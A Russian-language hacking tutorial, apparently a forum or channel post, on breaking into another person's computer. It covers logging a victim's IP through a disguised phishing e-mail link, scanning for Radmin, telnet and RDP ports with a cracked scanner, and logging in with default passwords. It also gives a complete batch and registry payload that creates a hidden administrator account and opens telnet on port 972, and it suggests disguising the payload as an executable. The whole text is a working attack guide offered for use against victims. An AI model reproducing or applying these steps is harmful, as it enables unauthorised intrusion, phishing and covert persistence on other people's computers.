Получаем доступ к чужому компьютеру через e-mail.
Mr. RobotКраткая теория:
1.находим жертву.
2. узнаете ip.
3. ищем открытые порты.
4. открываете порты (если открытых не было).
5. устанавливаете связь через порты(telnet - 23 порт, radmin - 4899 или remote Desktop - 3899).
6. план Б.
<УЗНАЁМ IP -шник.>
Узнаём IP ибо без него ничего не получится. Регаемся тут:
Теперь идем в «настройки», при необходимости загружаем свое изображение.После чего нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку! Не забудьте поставить галочку на «записывать IP в лог». Смысл в том, чтобы дать эту ссылку своей «жертве», но только со ссылкой cпрятанной в слове.
КМБ по html:
Надо создать текстовый файл с раширением html (или php), поместить в него код(см.ниже) с партнерской ссылкой и закачать его на свой домен.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<!-- Yandex.Metrika counter -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link type="image/x-icon" rel="shortcut icon" href="/favicon.ico" />
<title>НАЗВАНИЕ СТРАНИЦЫ</title>
<style>
html, body, iframe {margin:0;padding:0;height:100%;}
iframe {display:block;width:100%;border:none;}
</style>
</head>
<body>
<iframe src="ПАРТНЕРСКАЯ ССЫЛКА"></iframe>
</body>
</html>
Далее пишите какой-нибудь текст (включайте фантазию!!!). Возьмём самое простое:
Здравствуйте! На Ваш E-mail адрес была отправленна открытка, чтобы посмотреть ее, нажмите сюда.
Это было самое легкое, советую придумать что-то более оригинальное.
Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис. Так же можно использовать уже готовый, гугл вам в помощь.
Теперь, осталось жертве ПЕРЕЙТИ «посмотреть картинку», а нам как IP палится в логе!
Замечу так же что это всего лишь один из способов получения IP на канале в телеграмме Торчике модно найти ещё парочку:
http://telegra.ph/Vychislyaem-IP-po-pochte-08-08
http://telegra.ph/Dobyvaem-IP-i-opredelyaem-mestopolozhenie-08-10
< Проверяем хост на наличие уязвимостей / открытых портов >
Советую использовать несколько сканеров, что не покажет один покажет другой.
Первый сканер будет XSpider 7.5
Скачать можно здесь:
http://programsafe.ucoz.ru/load/xspider_7_5_krjaknutaja_versija/39-1-0-545
Или тут:
https://www.nulled.cc/threads/179115/
Теперь опишу настройку профиля
открываете сканер:
»>Профиль
»>Новый…
»>Комментарий (пишите что хотите)
»>Идете на вкладку «Сканер Портов», и внизу рядом с надписью «default.prt» давите [...]
»>Выйдет окошко, давите «новый»
»>Пустой
»>В комментах пишите что угодно
»>внизу увидеть «добавить порты» и пишите «4899» и «3389»
»>Сохранить как «4899».
»>Дольше выходите обратно на вкладки, и снимаете отовсюду галки.
Точно также создаём еще один профиль, только порт 23!
ВСЁ )))
< АТАКА>
Теперь вбиваете IP своей жертвы, в поле «добавить хост» и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (удаленный рабочий стол) — пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуемся(0_О !!! Теперь можете делать с чужим компом всё что вздумается, но не забывайте об ответственности.
БЕЗОПАСНОСТЬ кулхацкера заключается в чём? Правильно.Не палиться, поэтому рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. Вот ссылка:
http://telegra.ph/Sozdayom-uchyotku-i-dayom-ej-prava-06-30
<Настраиваем удаленный доступ>
RAdmin Viewer ,есть в стандартной комплектации Windows. Как с ним работать смотрите в этой ссылке:
Если не получилось подключиться, не отчаиваемся, читаем план Б.
< ПЛАН Б>
Если анализ ничего не дал?
Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко???
Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему.
Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит — нам остается только открыть доступ к этому сервису (порт 23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat.
Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия.
содержимое *.bat файла:
++++
chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Администраторы restot /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
++++
Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678.
Импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия.
Открываете 972 порт, и активируете телнет через него.
Записывается без плюсиков в блокнот, потом меняется расширение на *.bat
Теперь содержимое файла conf.reg:
++++
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
«restot»=dword:00000000
++++
В последней строке, в кавычках, пишите имя, которое указали в *.bat файле.
также записываете в блокнот, а потом меняете расширение на *.reg
Сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку, го в гугле.После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят...
Затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.
